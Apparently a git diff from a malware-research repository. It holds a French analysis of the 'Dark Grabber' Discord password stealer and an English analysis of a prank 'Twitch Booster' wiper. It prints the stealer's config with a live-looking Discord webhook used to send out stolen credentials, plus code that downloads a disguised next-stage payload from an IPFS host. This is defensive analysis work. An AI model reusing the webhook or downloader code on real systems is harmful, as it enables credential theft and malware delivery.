diff --git a/Random/Dark Grabber/writeup.md b/Random/Dark Grabber/readme.md
old mode 100755
new mode 100644
similarity index 97%
rename from Random/Dark Grabber/writeup.md
rename to Random/Dark Grabber/readme.md
index 5988174..e4030e1
--- a/Random/Dark Grabber/writeup.md
+++ b/Random/Dark Grabber/readme.md
@@ -1,65 +1,65 @@
-# Dark Grabber
-
-C'est un password stealer qui se fait passer pour un "Image grabber discord", il est distribué par **! 刀3ズ GMB#3666** sur discord notamment.
-
-Il existe deux versions du stealer, une appelée "Debug" et une "Normale".
-
-Les deux sont dans le même .zip et les admins demandent de les lancer les deux.
-
-*insérer une capture*
-
-## Version Normale
-
-Elle est appelée "Install Dark Grabber.bin".
-
-[Virustotal](https://www.virustotal.com/gui/file/8a12f091c08d2287409465e04c15d1ce53da419b626565a8e783e22bbe2368f4)
-C'est du Python 3.10 compilé avec pyinstaller.
-On peut utiliser [pyinstxtractor](https://github.com/extremecoders-re/pyinstxtractor) avec [pycdc](https://github.com/zrax/pycdc) pour retrouver la source.
-
-On extrait les fichiers :
-* antidebug.py
-* browsers.py
-* config.py
-* discordtoken.py
-* injection.py
-* 'Install Dark Grabber'.py
-* startup.py
-* systeminfo.py
-
-Les fichiers sont dans [l'annexe.](https://github.com/ALittlePatate/Malware-Research/tree/master/Random/Dark%20Grabber/Annexes)
-
-C'est un stealer python classique, il récupère les mots de passe des navigateurs, les cookies, les tokens discord et il s'injecte dans discord.
-
-La config :
-```Python
-__CONFIG__ = {
- 'webhook': 'https://discordapp.com/api/webhooks/1050142994168303628/lSVmYxnWxQ8K0VWpnbteH_ThH9-w6BaI765XntsihgtkSQOzXF2fuL5WRfEZaSGHh9Tp',
- 'antidebug': True,
- 'browsers': True,
- 'discordtoken': True,
- 'injection': True,
- 'startup': True,
- 'systeminfo': True }
-```
-
-## Version Debug
-
-Le fichier est appelé "Install Debug Dark Grabber", le nom original est "deno.exe".
-
-[Virustotal](https://www.virustotal.com/gui/file/c5e5db042d3a3e12b8484f29594d157268e3c63631f3a0ffd588ff7ad1d42e2f)
-
-
-C'est du typescript compilé avec [deno](https://deno.land/), il n'existe pas d'extracteur pour deno mais il stocke le code en clair dans l'exe. On peut le dump avec un éditeur hexadécimal comme [HxD](https://mh-nexus.de/en/hxd/).
-
-On extrait le code ci dessous dans **main.ts** :
-```typescript
-import { download, Destination } from "https://deno.land/x/download/mod.ts";
-
-await download("https://bafybeid7gnnacqshr64a6rpn6wevtexbw7kpiv2ckkrcdtnnmdtvd35j2e.ipfs.nftstorage.link/ikiyq", destination);
-```
-
-Ce code va télécharger ikiyq.exe et l'enregistrer sur le disque à `C:/Users/${username}/` sous le nom `Microsoft-Defender-Checker.exe`.
-
-`Microsoft-Defender-Checker.exe` est une dropper avec quelques decoys, il va drop `ikiyq.exe` qui est le stage final.
-[Virustotal de ikiyq.exe](https://www.virustotal.com/gui/file/392a8b2d7633da3a89247681ee1161a93f872d5a9ecee88ef8ed6e578225b71d)
-Pour finir, `ikiyq.exe` est du Python compilé avec [Nuitka](https://github.com/Nuitka/Nuitka).
+# Dark Grabber
+
+C'est un password stealer qui se fait passer pour un "Image grabber discord", il est distribué par **! 刀3ズ GMB#3666** sur discord notamment.
+
+Il existe deux versions du stealer, une appelée "Debug" et une "Normale".
+
+Les deux sont dans le même .zip et les admins demandent de les lancer les deux.
+
+*insérer une capture*
+
+## Version Normale
+
+Elle est appelée "Install Dark Grabber.bin".
+
+[Virustotal](https://www.virustotal.com/gui/file/8a12f091c08d2287409465e04c15d1ce53da419b626565a8e783e22bbe2368f4)
+C'est du Python 3.10 compilé avec pyinstaller.
+On peut utiliser [pyinstxtractor](https://github.com/extremecoders-re/pyinstxtractor) avec [pycdc](https://github.com/zrax/pycdc) pour retrouver la source.
+
+On extrait les fichiers :
+* antidebug.py
+* browsers.py
+* config.py
+* discordtoken.py
+* injection.py
+* 'Install Dark Grabber'.py
+* startup.py
+* systeminfo.py
+
+Les fichiers sont dans [l'annexe.](https://github.com/ALittlePatate/Malware-Research/tree/master/Random/Dark%20Grabber/Annexes)
+
+C'est un stealer python classique, il récupère les mots de passe des navigateurs, les cookies, les tokens discord et il s'injecte dans discord.
+
+La config :
+```Python
+__CONFIG__ = {
+ 'webhook': 'https://discordapp.com/api/webhooks/1050142994168303628/lSVmYxnWxQ8K0VWpnbteH_ThH9-w6BaI765XntsihgtkSQOzXF2fuL5WRfEZaSGHh9Tp',
+ 'antidebug': True,
+ 'browsers': True,
+ 'discordtoken': True,
+ 'injection': True,
+ 'startup': True,
+ 'systeminfo': True }
+```
+
+## Version Debug
+
+Le fichier est appelé "Install Debug Dark Grabber", le nom original est "deno.exe".
+
+[Virustotal](https://www.virustotal.com/gui/file/c5e5db042d3a3e12b8484f29594d157268e3c63631f3a0ffd588ff7ad1d42e2f)
+
+
+C'est du typescript compilé avec [deno](https://deno.land/), il n'existe pas d'extracteur pour deno mais il stocke le code en clair dans l'exe. On peut le dump avec un éditeur hexadécimal comme [HxD](https://mh-nexus.de/en/hxd/).
+
+On extrait le code ci dessous dans **main.ts** :
+```typescript
+import { download, Destination } from "https://deno.land/x/download/mod.ts";
+
+await download("https://bafybeid7gnnacqshr64a6rpn6wevtexbw7kpiv2ckkrcdtnnmdtvd35j2e.ipfs.nftstorage.link/ikiyq", destination);
+```
+
+Ce code va télécharger ikiyq.exe et l'enregistrer sur le disque à `C:/Users/${username}/` sous le nom `Microsoft-Defender-Checker.exe`.
+
+`Microsoft-Defender-Checker.exe` est une dropper avec quelques decoys, il va drop `ikiyq.exe` qui est le stage final.
+[Virustotal de ikiyq.exe](https://www.virustotal.com/gui/file/392a8b2d7633da3a89247681ee1161a93f872d5a9ecee88ef8ed6e578225b71d)
+Pour finir, `ikiyq.exe` est du Python compilé avec [Nuitka](https://github.com/Nuitka/Nuitka).
diff --git a/Random/Twitch Patcher/Files/Twitcha.bin b/Random/Twitch Patcher/Files/Twitcha.bin
new file mode 100644
index 0000000..0942e80
Binary files /dev/null and b/Random/Twitch Patcher/Files/Twitcha.bin differ
diff --git a/Random/Twitch Patcher/Files/readme.md b/Random/Twitch Patcher/Files/readme.md
new file mode 100644
index 0000000..575e016
--- /dev/null
+++ b/Random/Twitch Patcher/Files/readme.md
@@ -0,0 +1,5 @@
+# List of the files here :
+
+* twitch.bin --> First PE executed, extracted from the "setup"
+* Twitcha.exe --> File executed by twitch.bin after clicking "INSTALL", actually just a RAR archive.
+
diff --git a/Random/Twitch Patcher/Files/twitch.bin b/Random/Twitch Patcher/Files/twitch.bin
new file mode 100644
index 0000000..7fad7c3
Binary files /dev/null and b/Random/Twitch Patcher/Files/twitch.bin differ
diff --git a/Random/Twitch Patcher/Screenshots/form1.PNG b/Random/Twitch Patcher/Screenshots/form1.PNG
new file mode 100644
index 0000000..324b9bc
Binary files /dev/null and b/Random/Twitch Patcher/Screenshots/form1.PNG differ
diff --git a/Random/Twitch Patcher/readme.md b/Random/Twitch Patcher/readme.md
new file mode 100644
index 0000000..78cfaea
--- /dev/null
+++ b/Random/Twitch Patcher/readme.md
@@ -0,0 +1,124 @@
+# Twitch Booster/Patcher
+
+This wiper is very popular amongst a French forum ("18-25"), people used to send this to a random streamer pretending it would "fix" their stream.
+Compilations of people getting infected by this can be found easily on Youtube.
+
+The original version released in 2017, the one we're looking at is from 2023 and is actually not destructive, a simple reboot and everything is fixed.
+
+# Behaviour
+
+[Any.run link](https://app.any.run/tasks/fbc94828-b391-4c33-90b3-c689db7f59bb)
+As you can see it is pretty impressive, with the screen melting and loud music in the background.
+
+# Analysis
+
+## twitch.bin
+
+The ````twitch.bin```` file is unobfuscated .NET code. The code shows a simple form asking for your twitch username and password (optional) :
+
+
+
+Before the form is showed, the field ````Form1.Twitcha```` is set to ````%temp%/Twitcha.exe```` :
+````C#
+MyProject.Computer.FileSystem.SpecialDirectories.Temp + "\\Twitcha.exe";
+````
+
+Then the ```Form1_Load``` method is called with the ```base.Load```.
+This function will write the content of the ressource ```DNOQSSJ``` into ```Twitcha.exe```.
+
+When the install button is pressed the function ```TwitchButton1_Click``` is called. This function will detonate the wiper by starting the ```Twitcha.exe``` file using ````Process.Start```` function.
+
+## Twitcha.bin
+
+This file is a RAR archive that will self-extract these files :
+
+* 589.bat
+* 660.vbs
+* 4826.vbs
+* 7458.vbs
+* extension3.vbs
+* extension4.bat
+* extension5.vbs
+* extension6.exe
+* extension8.bat
+* extension9.vbs
+* extension110.vbs
+* Twitch Booster sans l'installateur et les taskkill.vbs
+* twitchbooster.mp3
+* TwitchBooster.vbs
+
+Then it will automatically start ```TwitchBooster.vbs```.
+
+### TwitchBooster.vbs
+
+This program will show two message boxes saying "Welcome on the network booster for twitch, do you want to start the installation ?", then "Installation was successful, you will not lag anymore on stream :) !"
+
+Afterwards it will create a shell and run ```660.vbs```, ```7458.vbs```, ```extension110.vbs```, ```extension5.vbs```, ```extension6.exe```, ```4826.vbs``` and ```extension3.vbs``` 66 times.
+
+#### 660.vbs
+
+Uses ```SAPI.SpVoice``` to make a robotic voice say "hi, i'm just the little voice that says that the 18 25 just destroyed your computer, have fun fixing it son of r*pe, very happy. shoutout to the kheys of the 18 25"
+
+#### 7458.vbs
+
+Starts ```extension4.bat```.
+
+#### extension4.bat
+
+Closes chrome.exe, firefox.exe and javaw.exe.
+
+#### extension110.vbs
+
+Starts ```589.bat```.
+
+#### 589.bat
+
+Closes explorer.exe
+
+#### extension5.vbs
+
+Plays the twitchbooster.mp3 file, which is [Risitas Issou Night Club](https://www.youtube.com/watch?v=ZRlPsHwrDvY).
+
+Probably pasted code (only file that has comments, in english but the people who made it were French).
+
+#### extension6.exe
+
+Only PE file of the archive, it is responsible for the melting screen effect.
+It is also pasted code as debug message boxes can still show up if ```CreateWindowEx``` failed for example :
+````C
+window_hwnd = CreateWindowExA(0, ClassName, 0, 0x80000000, 0, 0, nWidth, nHeight, 0, 0, hInstance, 0);
+if ( !window_hwnd )
+ return MessageBoxA(0, cannot_create_window_error, 0, 0x10u);
+````
+
+Also note that they left over the possibility to exit the melting screen effect by pressing ESCAPE :
+````C
+if ( ((GetAsyncKeyState(VK_ESCAPE) >> 8) & 0x80u) != 0 )
+ DestroyWindow(window_hwnd);
+````
+
+#### 4826.vbs
+
+This code will repeatedly open and close the CD/DVD drives if found.
+
+#### extension3.vbs
+
+This file is manually invoked 66 times, no idea why they didn't do a loop.
+It displays a messagebox saying "THE 18-25 F*CKED YOUR A** F*CKING MOTHER F*CKER", the title is "THE ELITE OF THE NATION".
+
+#### extension9.vbs
+
+This code is never called but is present in the archive.
+This code calls ```extension8.bat```.
+
+#### extension8.bat
+
+This code is never called but is present in the archive.
+This code registers a computer shutdown 300 seconds after it is called. The reason for the shutdown is "In 5 min, you will not have a pc anymore, son of r*pe. The virus of the youtuber Black f*cked your a** :)".
+
+#### Twitch Booster sans l'installateur et les taskkill.vbs
+
+This code is never called but is present in the archive.
+The filename translates to "Twitch Booster without the installer and the taskkill". THis is basically what it does, it's the same as ```TwitchBooster.vbs``` except that there is no prompt related to the installer. But it actually does taskkill chrome.exe and firefox.exe.
+
+